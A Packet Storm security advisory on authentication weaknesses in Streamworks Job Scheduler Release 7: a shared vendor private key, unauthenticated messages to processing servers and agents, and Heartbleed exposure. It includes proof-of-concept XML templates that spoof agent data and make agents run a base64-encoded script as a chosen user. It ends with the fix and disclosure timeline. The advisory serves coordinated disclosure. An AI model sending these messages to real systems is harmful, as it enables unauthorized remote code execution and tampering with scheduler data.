Lucene search

K
packetstormSimon BieberPACKETSTORM:151177
HistoryJan 16, 2019 - 12:00 a.m.

Streamworks Job Scheduler Release 7 Authentication Weakness

2019-01-1600:00:00
Simon Bieber
packetstormsecurity.com
210

EPSS

0.974

Percentile

99.9%

`  
Affected Products  
Streamworks Job Scheduler Release 7 (older/newer releases have not   
been tested)  
  
References  
Secuvera-SA-2016-01   
https://www.secuvera.de/advisories/secuvera-SA-2016-01.txt (used for   
updates)  
No CVE number could be assigned (vendor not listed under   
cve.mitre.org/data/board/archives/2016-01/msg00015.html)  
  
Summary:  
Arvato Systems Streamworks Job Scheduler is a software product for   
automation purposes. It helps  
"to plan, maintain, control and monitor all of your automatable IT   
processes" (source: vendor product  
homepage). It consists of different types of services: an   
application server daemon, a processing  
server daemon that controls one or multiple agent daemins   
installed on operating servers were workload  
has to be done.  
  
During a penetration test at a customers site three weaknesses   
concerning communication  
authentication were discovered:  
  
1) All agents installed on server systems use the same X.509   
certificates and private key that  
were issued by the vendor for authentication.  
  
2) The processing server component does not check received   
messages properly for authenticity.  
  
3) Agents installed on servers do not check received messages   
properly for authenticity  
  
4) Agents and processing servers are vulnerable against TLS   
Heartbleed attack (CVE-2014-0160 -  
see https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160)  
  
Effect:  
1) If systems were compromised and authentication material is   
stolen, all certificates have to be  
revoked and replaced. In addition, this expands the effect of   
3) to the entire environment,  
not just single systems.  
  
2) An attacker with knwolegde of the message syntax of the product   
and the authentication material  
is able to add, change or delete data within the Streamworks database.  
  
3) An attacker with knowledge of the message syntax of the product   
and the authentication material  
is able to create new or execute available jobs on servers with   
agents installed located within  
the same network. This can lead to a complete loss of integrity,   
confidentiality or availability  
of the respective system or data stored/processed on it.  
  
4) An unauthenticated remote attacker is able to read content   
within system memory.  
  
Vulnerable components and scripts:  
Streamworks Job Scheduler Processing Server Release 7.1  
Streamworks Job Scheduler Agent Release 7.1  
older releases have not been tested  
  
Examples:  
In the following, a sample to exploit 2) and 3) will be given.   
Replace Information within squared  
brackets:  
  
2) By sending a the following XML-Message to a Processing server   
it is possible to change system  
information of a legitimate configured client as proof-of-concept.   
The System OS Info was slightly  
changed:  
  
<AgentNotifyStarted ProcessId="7044" AgentVersion="3.1.36">  
<ComHeader Version="1.0">  
<MandatorCode>0100</MandatorCode>  
<MsgCreateTime>2016-02-24T10:26:11[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime>  
<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime>  
<SourceEndpoint Address="0.0.0.0" Port="30000" SysId="[Hostname of   
legitimate Client]" />  
<DestinationEndpoint Address="[FQDN of Processing server]"   
Port="9600" SysId="[FQDN of Proces  
sing server]" />  
<Sequence>0</Sequence>  
</ComHeader>  
<SystemInformation>  
<OsType>Windows</OsType>  
<OsInfo>Pentest Windows!</OsInfo>  
<OsLocale>de_DE.windows-1252</OsLocale>  
</SystemInformation>  
<KnownJobsList>  
</KnownJobsList>  
<FileTransferOptions Mode="ALL" BlockSize="0" />  
<Cli CliOptions="Enabled" />  
</AgentNotifyStarted>  
  
  
-------------  
  
  
3) By sending a XML-Message of the following type to create and   
execute a new job on a system  
<ServerRequestStartJob>  
<ComHeader Version="0.1">  
<MandatorCode>0100</MandatorCode>  
<MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime>  
<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime>  
<SourceEndpoint Address="[FQDN of processing server]"   
Port="9600" SysId="[FQDN of processing  
server]" />  
<DestinationEndpoint Address="[IP of Server with agent   
installed]" Port="30000" SysId="[Hostname of  
server with agent installed]" />  
<Sequence>1</Sequence>  
<MandatorId>0100</MandatorId>  
</ComHeader>  
<JobStartInfo>  
<JobInfo ServerJobId="118291965_1" ExecutionNo="1"   
PlanDate="[YYYY]-[MM]-[DD]"  
StreamName="[NewStreamName]" JobName="[NewJobName]" Run="1" />  
<UserName>[Username under which the agent should run the   
Script, e.g. LOCAL\System]</UserName>  
<Password>[Add Password of the user if needed]</Password>  
<UseUserProfile>true</UseUserProfile>  
<MainScript>[base64-encoded Script code, e.g.   
"cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl"  
to start a notepad.exe on a Windows Host]</MainScript>  
<KeepJoblogDays>10</KeepJoblogDays>  
</JobStartInfo>  
</ServerRequestStartJob>  
  
Solution:  
Install Streamworks Release 9.3  
  
(https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html - page available   
in  
german only)  
  
Disclosure Timeline:  
2016/05/12 vulnerabilities discovered  
2016/05/30 vendor initially contacted  
2016/06/13 sales representative replied  
2016/06/14 technically responsible contact details received  
2016/07/01 technical personnel contacted, appointment to discuss   
findings made  
2016/07/11 submitted technical details to responsible personnel  
2016/07/12 responsible product manager replied. Committed to   
extend disclosure timeline due to  
comprehensible reasons. New disclosure timeline: end of   
September 2016  
2016/09/08 product manager replied, suggest meeting to discuss fixes  
2016/09/27 meeting took place, half of the vulnerabilities were   
fixed. Timeline until disclosure extended  
again due to difficult changes. Disclosure timeline   
extended to end of April 2017  
2017/04/20 Contacted vendor again to remind of the near end of the   
disclosure timeline.  
2017/04/27 Reply and ongoing discussion about when the fix will be shipped.  
2017/05/20 Vendor replied that due to customers experience fewer   
releases were made. The fix will be shipped  
on the second quarter of 2018. Extended disclosure   
timeline until the end of June 2018.  
2018/04/03 Contacted vendor as reminder and to get a release ship date.  
2018/04/09 Vendor replied saying that within release 9.3 (shipped   
on 2nd quarter 2018) the issues will be fixed  
Final disclosure timeline: 2019/01/14 after a   
sufficient grace period to customers to install the fixed  
release  
2019/01/14 public advisory disclosure  
  
  
Credits  
Simon Bieber, secuvera GmbH  
[email protected]  
https://www.secuvera.de  
  
Disclaimer:  
All information is provided without warranty. The intent is to   
provide informa-  
tion to secure infrastructure and/or systems, not to be able to   
attack or damage.  
therefore secuvera shall not be liable for any direct or indirect   
damages that  
might be caused by using this information.  
  
  
  
  
  
`